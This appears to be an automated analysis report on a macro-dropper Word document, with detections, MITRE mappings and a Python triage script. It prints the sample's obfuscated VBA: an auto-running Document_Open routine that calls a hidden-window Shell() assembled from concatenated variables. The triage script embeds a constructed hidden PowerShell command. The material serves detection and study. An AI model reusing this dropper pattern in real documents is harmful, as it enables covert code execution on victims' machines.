Verdict: MALICIOUS
Risk Score: 182

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Office document carrying VBA macros. Its Document_Open handler runs as soon as the document is opened with macros enabled and ends in a Shell() call whose command string is assembled at runtime from 22 concatenated variables (plus a CVar("c") literal), so the command is not readable from the preview alone; the trailing window-style argument 0 (vbHide) hides the spawned process window. The surrounding functions are junk arithmetic on undefined variables wrapped in On Error Resume Next, padding added to defeat signature matching. A Shell() call in a macro is typically used to launch a downloader for a second-stage payload, and the ClamAV detection name Doc.Dropper.Agent-6615994-0 is consistent with a dropper. The document was most likely delivered as a spearphishing attachment.
Heuristics (5)
- critical CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6615994-0
- medium OLE_VBA_MACROS: Document contains VBA macro code (2 related findings)
- critical OLE_VBA_SHELL: Shell() call in VBA
- high OLE_VBA_DOCOPEN: Document_Open macro (auto-executes when the document is opened and macros are enabled)
- info EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). Caveat: this is the standard DrawingML XML namespace URI present in any document with drawing content, not a network indicator, and should not be treated as C2.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 39374 bytes | f65d9c60c0942d8efcaaf82648fdc2f71abf78b91c81c3b7c763d27e46a1fda1 |
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "mDWvoqoJDr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function ZatXNNWErQnOJ()
On Error Resume Next
vtRLdM = 83866 - njuGac - 59418 / kwnTdi / uPdklu * tmrEZS
hoGXT = 95674 - zbNzHd - 70087 / LVsXK / DKYdEU * OjjEU
ULEpQ = 21917 - RrVBL - 6398 / TInEGn / MGuOsl * UlJqn
XaLDi = 78010 - KEiNZS - 73459 / kzofb / rXAiB * LzqCdU
vhbBb = 98474 - CCMBT - 35782 / IAJCI / HEJaXa * zFLKY
End Function
Private Function sKvRdXtAljsd()
On Error Resume Next
ldqka = 65105 - OafFDP - 53385 / mNLoNp / VnQDvN * XNEzcP
rRBjSE = 50371 - ftainD - 42683 / ABpDoD / LzwRJ * kfjGaw
OMRqBD = 30202 - ivMPIX - 50553 / nKVvvK / NmpET * ZBckc
pzUdXG = 2528 - DsOcip - 79976 / HhvCK / bJhvo * dGXMq
IcaTR = 12649 - XGjCjz - 96977 / MiMIHC / hiJssJ * BNtJwV
bziHbl = 8057 - DDAsE - 20110 / ZKidXm / KwcSs * wUBmw
End Function
Private Function soozwUvicDjzb()
On Error Resume Next
bDQtB = 91594 - YZuEW - 88835 / OGiIb / qBlYY * jVlGm
TwRJD = 86518 - Mvziz - 78696 / dJROI / cRLslD * fbpNR
NnFiF = 73853 - XrlkB - 83854 / vzhDE / ZkVumT * NrQvXk
ljotcG = 62676 - alwoa - 91227 / BPulq / XDHBcE * jBkwm
EwpCiW = 17387 - JVHQri - 64455 / GCvOpP / Ejkkp * wdrVT
UwQEiM = 38697 - LzfUn - 26521 / UDpkB / fjszB * jZBBCd
End Function
Private Function NVKzYRLGi()
On Error Resume Next
PztOHL = 37599 - CRJSm - 49280 / ajfMAD / Xnhnk * XNqODl
RVtkj = 56717 - tGZXOL - 76549 / ajiGvA / SXMsv * IYBKYz
EqMztO = 4897 - IjJAw - 18792 / OJkZr / EZuajV * QAHIq
ttOKIT = 2188 - CTXmf - 40031 / SADnM / nuwSD * LEcKZm
TGMdw = 87488 - wJjYQp - 10425 / Hiqdu / jBmiYN * psjQH
iwurJ = 26924 - wwpjf - 54403 / wLCqw / FwPsEa * DaJzzO
End Function
Private Sub Document_open()
On Error Resume Next
iriwh = 4258 - tEmPi - 61625 / YsLQlb / DMYlzW * EtzXXL
DPLwj = 17310 - wnBLfT - 48343 / EDzLKi / czvsW * fPtSYc
RVMiLn = 14175 - PrAiot - 26649 / zvHafF / hfipL * sHUTub
dJKGQU = 47462 - YdpiHr - 94716 / kdqst / QjFDZL * NokEbu
AVKsVV = 66734 - RMrEOj - 9854 / AwbmRu / qjGIt * KrBLaD
nipWj = 84241 - NWHHzz - 17338 / Ezott / ANvMtL * FdjzHw
Shell "" + iwwQjshdfUTfQQ + iZAnNAomK + CVar("c") + ItHqiwIYzO + KvUQYDFPwwCtCu + GNCYvDalp + uicNpQGbFQL + AZGzXEwm + PkZDi + JDkKX + RGPqGGWAc + dCwvTtaTD + jzurokd + ibMUE + IsKtXFtlU + HBjWF + khMAQMimJ + wjfbIVTrn + YhjlwGSJ + SfaPArMjrsc + NjbjoN + YGSRdAC + YYtwLXKhFLU, 0
MpUHU = 81063 - ocaIzX - 41262 / zRJna / jUhNjd * swSKq
End Sub
Private Function RSTAwnDN()
On Error Resume Next
HauVCw = 55928 - uproO - 69551 / owFlD / OjRERw * OZZzHZ
jrbaIG = 8819 - HSErs - 23150 / uSYPd / BcvIDo * Lstir
okrvl = 1998 - zzdEzR - 48287 / EufGm / XrUfQt * uzEZfT
bapprk = 29775 - PzQAG - 63473 / wCUiJ / iZNui * aDDHXV
fQEjw = 98223 - GFUAua - 88943 / XGjRRs / PVHjE * ZiRznC
End Function
Private Function zVfLOlwzlwn()
On Error Resume Next
quEzuD = 9742 - lwXiYz - 93734 / WJncnP / zPmkz * pFssUP
mNOoXn = 53727 - jVQhza - 64170 / FBAvZ / laZWnM * wWkruh
ioCjli = 55888 - nunMr - 91341 / IwJNcr / wdbMu * WwQtcL
EmLkr = 39991 - cpEUhJ - 56274 / CMiSr / fnaJS * zPrFwz
QdEbQ = 14554 - brzWq - 35601 / mnZZwj / YEZnpw * dujfkT
End Function
Private Function PXTtmwwCs()
On Error Resume Next
lSljsG = 13337 - iWJLAE - 23299 / rKTTdX / RzSLh * AdSziL
lqvqzj = 51456 - WnKmC - 54348 / ziNrtn / mwZaG * LqhXw
HIBiw = 87749 - KWEZif - 4042 / IwJRFK / oXGobi * KXqhBj
NQzhS = 81596 - fAMsCd - 43369 / wfPQiL / cLJMB * AIBVM
FDsMR = 53112 - NOWOzn - 72517 / VUuZa / Mjwmc * zJzQB
YShhnc = 35586 - TrFKv - 81605 / QWANIT / ZuZAds * MVtUOS
NLIlY = 6213 - ovOwI - 25137 / XHiwoh / LizcL * tnnMa
ZiHImn = 5035 - HuAYf - 15690 / bbITqt / UwapLq * OGNMF
End Function
Private Function ivjhnYQdZzZmVk()
On Error Resume Next
TKpIEZ = 32230 - VqwnTi - 68162 / MKvKm
... (truncated)
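Added example, not the analyzer's own code: a small Python triage script that applies the same three macro heuristics this report fires (an auto-exec Document_Open entry point, a Shell statement, junk-arithmetic padding under On Error Resume Next) and statically resolves a Shell argument that is assembled by concatenating string fragments. The report preview does not show the assignments behind the variables in the sample's Shell line, so the macro text embedded in the script is constructed to mirror the sample's structure with invented fragment values; the resolved command is illustrative, not the real payload. Function, pattern and variable names are the example's own.

```python
"""Static triage of an extracted VBA macro dump.

Added example, not the analyzer's own code. Implements the three macro
heuristics fired in the report (auto-exec Document_Open, a Shell statement,
junk arithmetic under On Error Resume Next) and resolves a Shell argument that
is built by concatenating string fragments. Only the statement form
`Shell <expr>, <windowstyle>` seen in this sample is handled.
"""
import re

# Constructed macro text. It copies the structure of the extracted sample
# (junk arithmetic, Document_open, a Shell argument assembled from many
# variables); the fragment values are invented, since the report preview does
# not show the real assignments.
SAMPLE_VBA = '''Attribute VB_Name = "mDWvoqoJDr"
Private Function ZatXNNWErQnOJ()
On Error Resume Next
vtRLdM = 83866 - njuGac - 59418 / kwnTdi / uPdklu * tmrEZS
hoGXT = 95674 - zbNzHd - 70087 / LVsXK / DKYdEU * OjjEU
End Function
Private Sub Document_open()
On Error Resume Next
iriwh = 4258 - tEmPi - 61625 / YsLQlb / DMYlzW * EtzXXL
iwwQjshdfUTfQQ = "c"
iZAnNAomK = "md.exe /"
ItHqiwIYzO = Chr(32)
KvUQYDFPwwCtCu = "powershell -nop -w hidden -c "
GNCYvDalp = Chr(34) + "Start-Process calc.exe" + Chr(34)
Shell "" + iwwQjshdfUTfQQ + iZAnNAomK + CVar("c") + ItHqiwIYzO + KvUQYDFPwwCtCu + GNCYvDalp, 0
MpUHU = 81063 - ocaIzX - 41262 / zRJna / jUhNjd * swSKq
End Sub
'''

# Heuristic patterns (names mirror the report's OLE_VBA_* findings).
AUTOEXEC = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?Sub\s+(Document_Open|AutoOpen|Auto_Open|Workbook_Open)\b',
    re.I | re.M)
SHELL_STMT = re.compile(r'^\s*Shell\b', re.I | re.M)
# "name = <int> - <name> - <int> / <name>": the filler pattern padding this sample.
JUNK_LINE = re.compile(r'^\s*\w+\s*=\s*\d+\s*-\s*\w+\s*-\s*\d+\s*/\s*\w+')

ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$', re.M)
SHELL_ARG = re.compile(r'^\s*Shell\s*\(?\s*(.+?)\s*\)?\s*$', re.I | re.M)
# Pieces of a concatenation expression: "literal", CVar("literal"), Chr(n), identifier.
TOKEN = re.compile(r'"((?:[^"]|"")*)"|CVar\(\s*"((?:[^"]|"")*)"\s*\)|Chr\(\s*(\d+)\s*\)|(\w+)')


def score(vba: str) -> dict:
    """Count auto-exec entry points, Shell statements and junk lines in a macro dump."""
    lines = [l for l in vba.splitlines() if l.strip()]
    junk = sum(1 for l in lines if JUNK_LINE.match(l))
    return {
        "autoexec": AUTOEXEC.findall(vba),
        "shell_calls": len(SHELL_STMT.findall(vba)),
        "junk_lines": junk,
        "total_lines": len(lines),
    }


def eval_concat(expr: str, env: dict, depth: int = 0) -> str:
    """Evaluate a VBA concatenation (+ or &) of literals, CVar(literal), Chr(n) and variables.

    Variables resolve through `env` (name -> right-hand side). Identifiers that are never
    assigned (junk operands, VBA constants) contribute nothing, which is close to what an
    unset Variant yields in a string concatenation under On Error Resume Next.
    """
    if depth > 32:  # guard against self-referential assignments
        return ""
    parts = []
    for m in TOKEN.finditer(expr):
        lit, cvar, chr_n, name = m.groups()
        if lit is not None or cvar is not None:
            parts.append((lit if lit is not None else cvar).replace('""', '"'))
        elif chr_n is not None:
            parts.append(chr(int(chr_n)))
        elif name in env:
            parts.append(eval_concat(env[name], env, depth + 1))
    return "".join(parts)


def resolve_shell_commands(vba: str) -> list:
    """Rebuild the command string of every Shell statement in the dump."""
    env = dict(ASSIGN.findall(vba))
    commands = []
    for m in SHELL_ARG.finditer(vba):
        arg = m.group(1)
        # Shell pathname[, windowstyle]: strip a trailing numeric or vbXxx window style.
        # (A comma inside the last string fragment would defeat this simple split.)
        head, sep, tail = arg.rpartition(",")
        if sep and re.fullmatch(r'\d+|vb\w+', tail.strip()):
            arg = head
        commands.append(eval_concat(arg, env))
    return commands


if __name__ == "__main__":
    print(score(SAMPLE_VBA))
    for cmd in resolve_shell_commands(SAMPLE_VBA):
        print("Shell ->", cmd)
```

On a real dump, feed the decoded VBA source (for example the macros.bas carved above) instead of SAMPLE_VBA; the resolver only follows plain string assignments, so fragments produced by arithmetic, Replace(), StrReverse() or Mid() slicing will resolve to empty strings and must be emulated separately.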